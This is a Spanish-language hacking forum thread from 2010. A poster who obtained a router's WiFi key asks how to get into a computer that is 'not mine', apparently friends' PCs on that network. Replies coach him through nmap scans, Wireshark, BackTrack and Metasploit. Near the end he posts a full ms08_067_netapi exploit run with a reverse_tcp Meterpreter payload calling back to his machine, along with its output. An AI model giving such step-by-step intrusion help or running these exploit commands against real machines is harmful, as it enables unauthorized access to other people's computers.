Hola, posteo por aqui ya que perdi la pass de mi anterior cuenta jeje...
Bueno estoy haciendo pruebas en casa y ya me consegui la key de mi router con el wifiway 1.0, pero despues de conectarme con un portatil (tengo el de sobremesa que es el que utilizo normalmente) y me puse a buscar por google sobre como acceder a un pc a traves de un router pero todo lo que vi era "en el caso de que sean ambos pc's tuyos", que eso se hacerlo...
Lo que no tengo ni idea es como hacerlo si "uno es mio y otro no" xD....
¿Algún manual o sitio donde pueda documentarme? Gracias ;)
Metasploit y nmap
Un saludo
Me bajé ambos y estoy buscando manuales.... he leido algún post del foro pero au me queda bastante, si me podeis poner algun link para ir mas rapido os lo agradeceria, saludos y gracias ;)
Buenas, te recomiendo lectura...
Nmap
http://nmap.org/man/es/index.html
Metasploit
Busca por google que hay muchos manuales, y lectura que metasploit es un mundo xD
Podrias empezar haciendo esto
nmap 192.168.1.1/24
Le dices a nmap, mapeas la puerta de enlace (router) y te diga los equipos que hay en la red, para ver los puertos y si le puedes meter un exploit (Hay tienes que usar el metasploit) vamos pero mejor lee el enlace que esa manera es cutre, pero pa empezar esta bien.
Un saludo
;)
Una cosa, estoy usando el nmap - zenmap gui ¿es este? porque no es en modo consola, es esta ventana:
http://img694.imageshack.us/img694/9783/foto1zs.png
(No pongo la foto que ocupa media pagina xD)
Y con lo que pusiste me salen muchisimos datos jeje tendre que mirarlos y tal, aunque el SO no aparece creo, que lo he mirado por encima..
La duda es esa, ¿el nmap es el que uso verdad?
Y una cosa mas cuando intento usar el meta (consola) o el que sea me sale esta linea:
Configuring multi-user permissions for first run... ¿que hago?
Gracias :xD
PD: Vaya, mientras escribia esto me a salido la ventana del meta como habia visto en mil fotos, asique imagino que esta bien ya que sale lo del smf >...
Buenas, estoy un poco atascado... he estado (y estoy) mirando tutos del metasploit y tengo un par de dudas:
-¿Cual me conviene utilizar ahora, la version web, consola?
-Una vez tengo el mapeo completo en el nmap y localizo al amigo, digamos 192.168.1.99, no me devuelve apenas ningun dato, solo esto:
Nmap scan report for 192.168.1.99
Host is up (0.0020s latency).
All 1000 scanned ports on 192.168.1.99 are filtered
MAC Address: 00:11:2F:XX:XX:XX (Asustek Computer)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 2.00 ms 192.168.1.99
-En 192.168.1.1 me dice:
Network Distance: 1 hop
Service Info: OS: Linux; Device: broadband router
TRACEROUTE
HOP RTT ADDRESS
1 3.45 ms 192.168.1.1
¿El router usa linux?
-En 192.168.1.34 me da la mac, un warning, device type, Aggressive OS guesses y network distance. ¿El agressive OS guesses son los "puntos flacos del pc"?
Salen bastante datos, pero el OS no lo veo.
-En la opción "Hosts Details" aparecen 4 "pc's", uno soy yo el otro es el router y los demas los amigos. Pero hay una pantalla en concreto que sale "encendida" y las demas con un simbolo de interrogación, ¿que significa la pantalla iluminada?
Mire mi ip en cmd, y no coincide con la de la pantalla iluminada....
Gracias de antemano xDD :silbar:
Te conviene usarlo en modo consola, en el nmap lo mismo
Cita de: Aiouek en 18 Agosto 2010, 21:22 PM
-En la opción "Hosts Details" aparecen 4 "pc's", uno soy yo el otro es el router y los demas los amigos. Pero hay una pantalla en concreto que sale "encendida" y las demas con un simbolo de interrogación, ¿que significa la pantalla iluminada?
Mire mi ip en cmd, y no coincide con la de la pantalla iluminada....
Nose de que pantallas ablas, usa el nmap desde el cmd, no te compliques la vida.
Cita de: Aiouek en 18 Agosto 2010, 21:22 PM
-Una vez tengo el mapeo completo en el nmap y localizo al amigo, digamos 192.168.1.99, no me devuelve apenas ningun dato, solo esto:
Nmap scan report for 192.168.1.99
Host is up (0.0020s latency).
All 1000 scanned ports on 192.168.1.99 are filtered
MAC Address: 00:11:2F:XX:XX:XX (Asustek Computer)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 2.00 ms 192.168.1.99
-En 192.168.1.1 me dice:
Network Distance: 1 hop
Service Info: OS: Linux; Device: broadband router
TRACEROUTE
HOP RTT ADDRESS
1 3.45 ms 192.168.1.1
¿Que opciones le pusiste al mapeo? tambien puede que no tenga ningun servicio corriendo y por eso no detecta nada, tendrias que cogerle el trafico de red y ver que puedes hacer, te dejo un manual muy bueno
http://foro.elhacker.net/hacking_avanzado/how_to_ataque_modelo_wifi-t262484.0.html
Cita de: Aiouek en 18 Agosto 2010, 21:22 PM
-En 192.168.1.34 me da la mac, un warning, device type, Aggressive OS guesses y network distance. ¿El agressive OS guesses son los "puntos flacos del pc"?
Salen bastante datos, pero el OS no lo veo.
Probaste esto
nmap 192.168.1.34/24 -OUn saludo
¡¡Gracias por la guia!! Hay cosas que me llevaran un poco de tiempo pero eso esta perfecto :D
Si probe con el modificador -O, pero me devulelve exactamente lo mismo, ¿es raro?
Saludos!
Pd: El problema esque ahora estaba pensando hacerlo en windows, pero la guia esta pa linux :P
Puedes usar Backtrack que para cosas asi fucniona bien, pero la verdad si le metes un linux de sistema base mucho mejor.
Cita de: Aiouek en 19 Agosto 2010, 21:25 PM
Si probe con el modificador -O, pero me devulelve exactamente lo mismo, ¿es raro?
Saludos!
Prueba todo eso desde backtrack, si te devuelve lo mismo pegalo aki.
Un saludo
Entonces voy a meterme a linux, me bajare todos los programas pa linux y cuando los tenga te pego el recorte del backtrack, saludos ;)
Buenas, lo del backtrack me lo descargare mas adelante desde otro sitio ya que donde estoy ahora la linea es lenta y no quiero cogerle todo el ancho de banda.
Lo pase todo a linux, solo el nmap y el meta, y ya hare pruebas con mi equipo para divertirme un rato antes de hacer chorradas :P
Asique dentro de pocos dias abriré de nuevo este post, en una o 2 semanas, ¡gracias!
Por cierto, ¿el backtrack se puede instalar en ubuntu no? vamos que no es un programa estilo wifiway, que puede ejecutarse como un programa normal desde ubuntu....
¿Que tarjetas son las mejores para esto? Lei que son las atheros, ¿pero dentro de las atheros cual es la mas recomendable?
Saludos!
Cita de: Aiouek en 21 Agosto 2010, 18:38 PM
Por cierto, ¿el backtrack se puede instalar en ubuntu no? vamos que no es un programa estilo wifiway, que puede ejecutarse como un programa normal desde ubuntu....
No, Backtrack no se puede instalar dentro de ubuntu porque es un sistema operativo como Wifiway, lo puedes poner de livedvd o sistema base, pero yo te recomiendo que te pongas ubuntu o la distribucion que kieras y le metas los programas que necesites.
Cita de: Aiouek en 21 Agosto 2010, 18:38 PM
¿Que tarjetas son las mejores para esto? Lei que son las atheros, ¿pero dentro de las atheros cual es la mas recomendable?
Yo habia pensado en esta
http://foro.elhacker.net/materiales_y_equipos/iquestque_piensan_de_este_equipo-t302244.0.html
pero nose si funcara bien, nadie respondio.
Un saludo
Buenas, aqui te pongo lo que me sale con root@Terminal:~# nmap 192.168.1.1/24 -O:
Starting Nmap 5.00 ( http://nmap.org ) at 2010-08-26 20:02 CEST
Interesting ports on 192.168.1.1:
Not shown: 996 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
23/tcp open telnet
80/tcp open http
MAC Address: 64:68:0C:XX:XX:XX (Unknown)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.15 - 2.6.26
Network Distance: 2 hop
All 1000 scanned ports on 192.168.1.33 are closed
MAC Address: 00:E0:98:XX:XX:XX (AboCom Systems)
Too many fingerprints match this host to give specific OS details
Network Distance: 2 hop
All 1000 scanned ports on 192.168.1.34 are closed
Too many fingerprints match this host to give specific OS details
Network Distance: 0 hops
OS detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (3 hosts up) scanned in 12.12 seconds
Y con nmap 192.168.1.1/24 "que los 1000 puertos escaneados estan cerrados"..
Estoy bajando el backtrack, en un rato subo los resultados. Saludos.
buenas a todos
Los felicito a todos ,se aprende mucho leyendo lo que estan escribiendo ,el uno preguntando y el otro respondiendo .
Ahora hay algo que no me cuadra .
como pueden ver las PC que estan detras de un router con el NMAP , si la unica manera de ver las PC que forman parte de esa LAN escondidas detras del router es formando parte de la lan interna del router ,pero no desde afuera
Desde afuera solo veria la MAc del router y escaneo de puertos y etc pero no las PC que estan detras
La manera seria con DMZ , Virtual AP, NAT , desvio del DNS ,etc
??? Estoy equivocado acaso o no
Buenas a todos, yo me saqué la pass del router, me conecto al router y apartir de ahi hago nmap porque uso el wifiway para ese primer paso que es un poco mas rapido :P...
Bueno estoy en backtrack y he llegado a un punto donde estoy estancadisimo:
Ya en startx abro la konsola, y hago este procedimiento:
iwlist wlan0 scan (essid, mode master, enc on)
ifconfig wlan0 down
iwconfig wlan0 mode managed, porque no me soporta mode master [Error 8B2A creo recordar]
ifconfig wlan0 up
iwconfig wlan0 key s:key-en-ascii
iwconfig wlan0 essid ESSID
dhclient wlan0 (ya que no tengo instalado el dhcpcd y al no tener internet/es live-cd)
Al hacer el ultimo paso, dhclient, parece que hace una especie de ping mostrando los milisengudos y al +-decimo intento me saca un error diciendo que no recibe tal dato y ahi se para.
El error que veo es lo del mode ya que me indica master y yo al no poder poner el master pongo managed. He leido que si eso lo que me pasa es cosa del driver que no lo soporta, ¿entonces que puedo hacer?
Saludos ;)
Buenas, en el nmap como se ve tiene todo cerrado, como dice la guia usa el
wireshark, para ver el trafico y aver que se cuece, y la otra seria refinar mas el mapeo, no te puedo ayudar más, porque no estoi en mi pc.
Cita de: Aiouek en 28 Agosto 2010, 13:46 PM
Buenas a todos, yo me saqué la pass del router, me conecto al router y apartir de ahi hago nmap porque uso el wifiway para ese primer paso que es un poco mas rapido :P...
Bueno estoy en backtrack y he llegado a un punto donde estoy estancadisimo:
Ya en startx abro la konsola, y hago este procedimiento:
iwlist wlan0 scan (essid, mode master, enc on)
ifconfig wlan0 down
iwconfig wlan0 mode managed, porque no me soporta mode master [Error 8B2A creo recordar]
ifconfig wlan0 up
iwconfig wlan0 key s:key-en-ascii
iwconfig wlan0 essid ESSID
dhclient wlan0 (ya que no tengo instalado el dhcpcd y al no tener internet/es live-cd)
Al hacer el ultimo paso, dhclient, parece que hace una especie de ping mostrando los milisengudos y al +-decimo intento me saca un error diciendo que no recibe tal dato y ahi se para.
El error que veo es lo del mode ya que me indica master y yo al no poder poner el master pongo managed. He leido que si eso lo que me pasa es cosa del driver que no lo soporta, ¿entonces que puedo hacer?
Saludos ;)
Fijo que es por el driver, dime el chip que tiene tu tarjeta, si no lo sabes haz un
lspciAbria que ver el driver que usa, aver que se puede hacer :-\
lsmodpara conectarte puedes usar wicd del menu para que te sea mas facil, para activarlo creo que era algo asi
/etc/init.d/wicd startUn saludo
Buenas, ok probaré. Ahora lo estoy haciendo en un XP sp3 y no esta muy actualizado asique me imagino que en cuanto pueda hacerlo, necesito conectarme al router, saldrán mas cosillas xD
Lspci:
Host bridge: Intel Corporation Mobile 4 Series Chipset Memory Controller
Ethernet controller: Atheros Communications Inc. AR5001 Wireless Network
Airmon-ng:
Chipset: Atheros
Driver: ath5k - [phy0]
Saludos
PD: Esto me importa pero de momento estoy haciendo todo casero y puedo conectar dos pc sin problemas.
Buenas, usando nmap contra un XP SP3, con firewall activado y eset nod32 4.2, me dice que estan filtrados los puertos en cuestion.
Hago trampas :laugh: y desactivo un rato el firewall, mientras nessus hace el scaneo.
Me saca varias vulnerabilidades, una en concreto alta, pero a la hora de montar todo con el meta me tira esto :O
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST 192.168.1.34
set LHOST 192.168.1.33
set SMBPIPE srvsvc
set EXITFUNC thread
set target 45
exploitResultado:
- Started reverse handler on 192.168.1.33:4444
[-] Exploit exception: The server responded with error: STATUS_ACCESS_DENIED (Command=162 WordCount=0)
- Exploit completed, but no session was created.
Y al usar como payload:
windows/vncinject/reverse_tcp
Me dice que expiró el tiempo [con el firewall activado] y el mismo error sin el firewall.
_________________________________________________________________________
PD: Tengo el scan hecho por nessus y para que no meta la pata con que exploit utilizar he creado una db, lo tengo todo apunto excepto lo mas importante y esque el nessus no me genera los .neb solo me genera .nessus, .nessus (v1) y html ¿Como hago para que me saque los necesarios .neb? ¿puedo pasar cualquiera de los tres formatos que me deja a .neb?...;)
Si a alguien se le ocurre algo estoy por aqui un rato ;)
Saludos